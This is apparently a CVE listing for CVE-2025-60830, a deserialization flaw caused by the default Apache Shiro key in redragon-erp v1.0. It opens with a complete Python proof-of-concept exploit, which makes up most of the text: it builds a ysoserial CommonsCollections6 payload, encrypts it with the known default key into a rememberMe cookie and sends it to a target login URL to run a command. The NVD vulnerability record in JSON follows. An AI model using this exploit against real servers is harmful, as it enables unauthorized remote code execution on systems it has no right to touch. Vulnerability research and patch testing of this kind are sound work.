CVE-2025-60830

# CVE-2025-60830 PoC - Shiro Default Key Deserialization Exploit # Affected: redragon-erp v1.0 # Description: Exploit Shiro's default key to perform deserialization attack import requests import base64 from Crypto.Cipher import AES import uuid import subprocess # Apache Shiro default key (publicly known) SHIRO_DEFAULT_KEY = "kPH+bIxk5D2deZiIxcaaaA==" TARGET_URL = "http://target-redragon-erp.com/login" COMMAND = "whoami" def get_ysoserial_payload(gadget, cmd): """Generate payload using ysoserial tool""" # Requires ysoserial.jar to be in the same directory # Usage: java -jar ysoserial.jar CommonsCollections6 "command" try: result = subprocess.run( ['java', '-jar', 'ysoserial.jar', gadget, cmd], capture_output=True ) return result.stdout except Exception as e: print(f"Error generating payload: {e}") return None def aes_encrypt(data, key): """AES-CBC encryption with PKCS5Padding""" # Pad the key to 16 bytes key_bytes = key.encode('utf-8')[:16].ljust(16, b'\x00') # Generate random IV iv = uuid.uuid4().bytes cipher = AES.new(key_bytes, AES.MODE_CBC, iv) # PKCS5Padding pad_len = 16 - (len(data) % 16) padded_data = data + bytes([pad_len] * pad_len) encrypted = cipher.encrypt(padded_data) return iv + encrypted def encode_rememberme(payload): """Encode payload as Shiro RememberMe cookie""" # Step 1: AES encrypt with default key encrypted = aes_encrypt(payload, SHIRO_DEFAULT_KEY) # Step 2: Base64 encode return base64.b64encode(encrypted).decode('utf-8') def exploit(target_url, command): """Execute the Shiro deserialization exploit""" print(f"[*] Target: {target_url}") print(f"[*] Command: {command}") # Generate malicious serialized payload using CommonsCollections gadget print("[*] Generating malicious payload...") payload = get_ysoserial_payload("CommonsCollections6", command) if payload is None: print("[!] Failed to generate payload. Make sure ysoserial.jar exists.") return # Encode as RememberMe cookie rememberme = encode_rememberme(payload) print(f"[*] Generated RememberMe cookie: {rememberme[:50]}...") # Send exploit request cookies = {"rememberMe": rememberme} headers = { "User-Agent": "Mozilla/5.0", "Cookie": f"rememberMe={rememberme}" } print("[*] Sending exploit...") try: response = requests.get(target_url, headers=headers, timeout=10) print(f"[*] Response status: {response.status_code}") if response.status_code == 200: print("[+] Exploit may have succeeded!") else: print("[-] Exploit failed.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": exploit(TARGET_URL, COMMAND)

{"cve": {"id": "CVE-2025-60830", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:45.823", "lastModified": "2025-10-10T16:16:59.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "redragon-erp v1.0 was discovered to contain a Shiro deserialization vulnerability caused by the default Shiro key."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redragon-erp:redragon-erp:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "619140D4-FBC3-4454-AA05-2E8DCCFAE7D1"}]}]}], "references": [{"url": "https://gist.github.com/ChangeYourWay/3b3d3dd5727272c435f1b1f6c17b7181", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Yyjccc/document/blob/main/redragon-erp/redragon-erp.md", "source": "[email protected]", "tags": ["Exploit"]}]}}